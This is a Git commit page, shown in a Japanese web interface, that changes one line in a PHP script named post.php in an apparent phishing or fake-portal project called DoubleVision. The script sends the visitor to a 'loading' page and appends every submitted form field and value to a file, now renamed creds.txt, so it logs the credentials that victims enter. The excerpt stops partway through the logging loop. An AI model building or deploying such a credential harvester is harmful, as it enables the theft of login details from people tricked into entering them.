ソースを参照

Update post.php

assume-breach 3 年 前
コミット
ed84ed2e9c
1 ファイル変更1 行追加1 行削除
  1. 1 1
      DoubleVision/html/post.php

+ 1 - 1
DoubleVision/html/post.php

@@ -1,6 +1,6 @@
 <?php
 <?php
 header ('Location:http://10.1.1.1/loading.html');
 header ('Location:http://10.1.1.1/loading.html');
-$handle = fopen("usernames.txt", "a");
+$handle = fopen("creds.txt", "a");
 foreach($_POST as $variable => $value) {
 foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, "=");